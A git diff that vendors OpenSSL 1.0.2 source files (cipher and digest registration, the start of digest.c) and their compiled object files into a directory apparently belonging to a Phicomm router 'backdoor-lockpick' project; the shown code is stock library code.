+    EVP_add_cipher(EVP_aes_128_cbc());
+    EVP_add_cipher(EVP_aes_128_cfb());
+    EVP_add_cipher(EVP_aes_128_cfb1());
+    EVP_add_cipher(EVP_aes_128_cfb8());
+    EVP_add_cipher(EVP_aes_128_ofb());
+    EVP_add_cipher(EVP_aes_128_ctr());
+    EVP_add_cipher(EVP_aes_128_gcm());
+    EVP_add_cipher(EVP_aes_128_xts());
+    EVP_add_cipher(EVP_aes_128_ccm());
+    EVP_add_cipher(EVP_aes_128_wrap());
+    EVP_add_cipher_alias(SN_aes_128_cbc, "AES128");
+    EVP_add_cipher_alias(SN_aes_128_cbc, "aes128");
+    EVP_add_cipher(EVP_aes_192_ecb());
+    EVP_add_cipher(EVP_aes_192_cbc());
+    EVP_add_cipher(EVP_aes_192_cfb());
+    EVP_add_cipher(EVP_aes_192_cfb1());
+    EVP_add_cipher(EVP_aes_192_cfb8());
+    EVP_add_cipher(EVP_aes_192_ofb());
+    EVP_add_cipher(EVP_aes_192_ctr());
+    EVP_add_cipher(EVP_aes_192_gcm());
+    EVP_add_cipher(EVP_aes_192_ccm());
+    EVP_add_cipher(EVP_aes_192_wrap());
+    EVP_add_cipher_alias(SN_aes_192_cbc, "AES192");
+    EVP_add_cipher_alias(SN_aes_192_cbc, "aes192");
+    EVP_add_cipher(EVP_aes_256_ecb());
+    EVP_add_cipher(EVP_aes_256_cbc());
+    EVP_add_cipher(EVP_aes_256_cfb());
+    EVP_add_cipher(EVP_aes_256_cfb1());
+    EVP_add_cipher(EVP_aes_256_cfb8());
+    EVP_add_cipher(EVP_aes_256_ofb());
+    EVP_add_cipher(EVP_aes_256_ctr());
+    EVP_add_cipher(EVP_aes_256_gcm());
+    EVP_add_cipher(EVP_aes_256_xts());
+    EVP_add_cipher(EVP_aes_256_ccm());
+    EVP_add_cipher(EVP_aes_256_wrap());
+    EVP_add_cipher_alias(SN_aes_256_cbc, "AES256");
+    EVP_add_cipher_alias(SN_aes_256_cbc, "aes256");
+# if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA1)
+    EVP_add_cipher(EVP_aes_128_cbc_hmac_sha1());
+    EVP_add_cipher(EVP_aes_256_cbc_hmac_sha1());
+# endif
+# if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA256)
+    EVP_add_cipher(EVP_aes_128_cbc_hmac_sha256());
+    EVP_add_cipher(EVP_aes_256_cbc_hmac_sha256());
+# endif
+#endif
+
+#ifndef OPENSSL_NO_CAMELLIA
+    EVP_add_cipher(EVP_camellia_128_ecb());
+    EVP_add_cipher(EVP_camellia_128_cbc());
+    EVP_add_cipher(EVP_camellia_128_cfb());
+    EVP_add_cipher(EVP_camellia_128_cfb1());
+    EVP_add_cipher(EVP_camellia_128_cfb8());
+    EVP_add_cipher(EVP_camellia_128_ofb());
+    EVP_add_cipher_alias(SN_camellia_128_cbc, "CAMELLIA128");
+    EVP_add_cipher_alias(SN_camellia_128_cbc, "camellia128");
+    EVP_add_cipher(EVP_camellia_192_ecb());
+    EVP_add_cipher(EVP_camellia_192_cbc());
+    EVP_add_cipher(EVP_camellia_192_cfb());
+    EVP_add_cipher(EVP_camellia_192_cfb1());
+    EVP_add_cipher(EVP_camellia_192_cfb8());
+    EVP_add_cipher(EVP_camellia_192_ofb());
+    EVP_add_cipher_alias(SN_camellia_192_cbc, "CAMELLIA192");
+    EVP_add_cipher_alias(SN_camellia_192_cbc, "camellia192");
+    EVP_add_cipher(EVP_camellia_256_ecb());
+    EVP_add_cipher(EVP_camellia_256_cbc());
+    EVP_add_cipher(EVP_camellia_256_cfb());
+    EVP_add_cipher(EVP_camellia_256_cfb1());
+    EVP_add_cipher(EVP_camellia_256_cfb8());
+    EVP_add_cipher(EVP_camellia_256_ofb());
+    EVP_add_cipher_alias(SN_camellia_256_cbc, "CAMELLIA256");
+    EVP_add_cipher_alias(SN_camellia_256_cbc, "camellia256");
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_allc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_allc.o
new file mode 100644
index 0000000000000000000000000000000000000000..6f46fe466d99c210fc0007503453c5e654621b0c
GIT binary patch
literal 15544
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_alld.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_alld.c
new file mode 100644
index 0000000..fdbe3ee
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_alld.c
@@ -0,0 +1,114 @@
+/* crypto/evp/c_alld.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/pkcs12.h>
+#include <openssl/objects.h>
+
+void OpenSSL_add_all_digests(void)
+{
+#ifndef OPENSSL_NO_MD4
+    EVP_add_digest(EVP_md4());
+#endif
+#ifndef OPENSSL_NO_MD5
+    EVP_add_digest(EVP_md5());
+    EVP_add_digest_alias(SN_md5, "ssl2-md5");
+    EVP_add_digest_alias(SN_md5, "ssl3-md5");
+#endif
+#if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA0)
+    EVP_add_digest(EVP_sha());
+# ifndef OPENSSL_NO_DSA
+    EVP_add_digest(EVP_dss());
+# endif
+#endif
+#if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA1)
+    EVP_add_digest(EVP_sha1());
+    EVP_add_digest_alias(SN_sha1, "ssl3-sha1");
+    EVP_add_digest_alias(SN_sha1WithRSAEncryption, SN_sha1WithRSA);
+# ifndef OPENSSL_NO_DSA
+    EVP_add_digest(EVP_dss1());
+    EVP_add_digest_alias(SN_dsaWithSHA1, SN_dsaWithSHA1_2);
+    EVP_add_digest_alias(SN_dsaWithSHA1, "DSS1");
+    EVP_add_digest_alias(SN_dsaWithSHA1, "dss1");
+# endif
+# ifndef OPENSSL_NO_ECDSA
+    EVP_add_digest(EVP_ecdsa());
+# endif
+#endif
+#if !defined(OPENSSL_NO_MDC2) && !defined(OPENSSL_NO_DES)
+    EVP_add_digest(EVP_mdc2());
+#endif
+#ifndef OPENSSL_NO_RIPEMD
+    EVP_add_digest(EVP_ripemd160());
+    EVP_add_digest_alias(SN_ripemd160, "ripemd");
+    EVP_add_digest_alias(SN_ripemd160, "rmd160");
+#endif
+#ifndef OPENSSL_NO_SHA256
+    EVP_add_digest(EVP_sha224());
+    EVP_add_digest(EVP_sha256());
+#endif
+#ifndef OPENSSL_NO_SHA512
+    EVP_add_digest(EVP_sha384());
+    EVP_add_digest(EVP_sha512());
+#endif
+#ifndef OPENSSL_NO_WHIRLPOOL
+    EVP_add_digest(EVP_whirlpool());
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_alld.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/c_alld.o
new file mode 100644
index 0000000000000000000000000000000000000000..9a056fbef6185df2a2af1a9beea5a1e1e225a35a
GIT binary patch
literal 4304
zcmcJROKcle6o#+kgrv}>X$z=OC~hgx3Ow@Ic~%9*N$jNH#8I6h9zw?Pm^$DWwj-J#
z0RkZ&QYF}x1q;})qq~Y#6|u<<bqQ?P@mK;25GpF?zjIG=eC=6K#F6gnoBy19=gyro
z^JXfO?hAz!TSz^jc1KK=THd$YpVr-JHLUij-}fK=Yx!q@g%7rM+c8+UbQi8&3%x~x
zOOK=PUk~6N&cTEK6!zab2kHN(<pqcBzVaMx`Y+hj#kn!nYE|OVs;4^%-N`K^UEoBt
zRW7*dTrL^ah&$1^nq$VDXuaYQ&AG~JwaDk}a%yqT9gnHzTBB6;RI}<~q~>R5Pe)Fk
zUtO=Y*CSI-!ih!QiFG}6--ySY*yt%AV|hyTQyHN$KxKaEyy{bG3oJ|pcBkK{(B?T6
zx;PR#vUhOkBRYup5l4Z&hl80K9tm%ThKDo>t|0AKzuxSn2=_eUSPQSF(<`i3-^nlv
z>$~a22fLxx_g-~a?dj6rt_gOl)AsA(K-Y@={TrY+veWJ{`nx-^I%@b4i$7@iLl!@2
zxMT6C;Zqim8$M(43B$7%KV$fc#eM$)^{mAgjJ{~`CBt8~IEG<$TNlNA2gP~NXN*{d
z3eKx-ZxiUnKMdfX1n|!S_?H3vY5>0$z_$bV^#J}|0RJg~{}#ai4&X!dLiXCXLjhbB
z^My*qbBfBz%*If;sN$#+s76tZp&Caufoc-f6e`zu(LSzrauX`sDAjVgOupcG2%h)W
zE|gmBmdej(vNOp{KATSGQY-nD<V+@&SE;9$^HpzDxA5@Q29K%i%#-=0<YEfZG^7-(
zTS}Web{Y7cs#lC_;-^xiQA|RP@wh(^x?|%^6O%i1jBWzj*UD?nN~2!K@zlmA8oBgd
zDmQNWHtb*4c>?b^^Fx9ouQKO6fH+cr-01tLMV4Yc=K*l!D&`65!w~0wD$Gv<lG$<6
zKGysW>a+eS!|gcBf+L5q{u#mL`d<+I0iiDmF7=!@FmFWYn*sU_!*O4Gh5lW^k&}6y
z$P+O8zCQM`-UmE8)_*EEazFFW4Y%WbA^0(&zaqH2U*r`S){pm-<9`iE27Z7FbL176
zJ?}R@?uzrh;0LMCaegq|j`O3?%k?1Nz_1>iVUF_$AekNKhL1HrPJPz*Q@(*gFZW@O
z;P?iz{(#_8f7o!W2j5=SpAa0szRXXFIP$%S3B8PSMsR$)IZiSlPFnC2Lcb)qTz^h*
zeCs*>^MXtLi-JEa^ku=NzAE@5LccD!)Ncxoe+^#GJAzAngfuYhKgy0dt&M8Cu&SI^
zyXm)O?lnu5g3~TtY%9krv<u2vrBv-S>li@pI`q9L)~nT0jU=^tyX4TXYP8iZ6kjpp
z3$=Bp(X2O0&GrVlB4DYUf2mohazfcz$gOoE<c3@3yv|XkO^5$an49h4p+3_%+tWM5
z?`#eF?Vq?vhFl9@{v$mMNQP$%ZvP2y+Y>=dX5+_*A?B_6yC!CwT4_B0s}fS5=jV3X
zu$ZNrG>7C-i?biMXN|ulQ^k%$wtJQRnBYGZTW!nB21HnBTHb%gxIe_S{oglWl7*(V
z{qbYa>-m3$j}sX`XFPv=&)J`Ouess3W#<3ZJXnN-kL{0`_OmCXE}H{=%-S$(sJ}J6
P{I8q!zm8zSZ2x}%XL07B

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/digest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/digest.c
new file mode 100644
index 0000000..bd7760d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/digest.c
@@ -0,0 +1,403 @@
+/* crypto/evp/digest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+# include "evp_locl.h"
+#endif
+
+void EVP_MD_CTX_init(EVP_MD_CTX *ctx)
+{
+    memset(ctx, '\0', sizeof *ctx);
+}
+
+EVP_MD_CTX *EVP_MD_CTX_create(void)
+{
+    EVP_MD_CTX *ctx = OPENSSL_malloc(sizeof *ctx);
+
+    if (ctx)
+        EVP_MD_CTX_init(ctx);
+
+    return ctx;
+}
+
+int EVP_DigestInit(EVP_MD_CTX *ctx, const EVP_MD *type)
+{
+    EVP_MD_CTX_init(ctx);
+    return EVP_DigestInit_ex(ctx, type, NULL);
+}
+
+int EVP_DigestInit_ex(EVP_MD_CTX *ctx, const EVP_MD *type, ENGINE *impl)
+{
+    EVP_MD_CTX_clear_flags(ctx, EVP_MD_CTX_FLAG_CLEANED);
+#ifdef OPENSSL_FIPS
+    /* If FIPS mode switch to approved implementation if possible */
+    if (FIPS_mode()) {
+        const EVP_MD *fipsmd;
+        if (type) {
+            fipsmd = evp_get_fips_md(type);
+            if (fipsmd)
+                type = fipsmd;
+        }
+    }
+#endif
+#ifndef OPENSSL_NO_ENGINE
+    /*
+     * Whether it's nice or not, "Inits" can be used on "Final"'d contexts so
+     * this context may already have an ENGINE! Try to avoid releasing the
+     * previous handle, re-querying for an ENGINE, and having a
+     * reinitialisation, when it may all be unecessary.
+     */
+    if (ctx->engine && ctx->digest && (!type ||
+                                       (type
+                                        && (type->type ==
+                                            ctx->digest->type))))
+        goto skip_to_init;
+    if (type) {
+        /*
+         * Ensure an ENGINE left lying around from last time is cleared (the
+         * previous check attempted to avoid this if the same ENGINE and
+         * EVP_MD could be used).
+         */
+        if (ctx->engine)
+            ENGINE_finish(ctx->engine);
+        if (impl) {
+            if (!ENGINE_init(impl)) {
+                EVPerr(EVP_F_EVP_DIGESTINIT_EX, EVP_R_INITIALIZATION_ERROR);
+                return 0;
+            }
+        } else
+            /* Ask if an ENGINE is reserved for this job */
+            impl = ENGINE_get_digest_engine(type->type);
+        if (impl) {
+            /* There's an ENGINE for this job ... (apparently) */
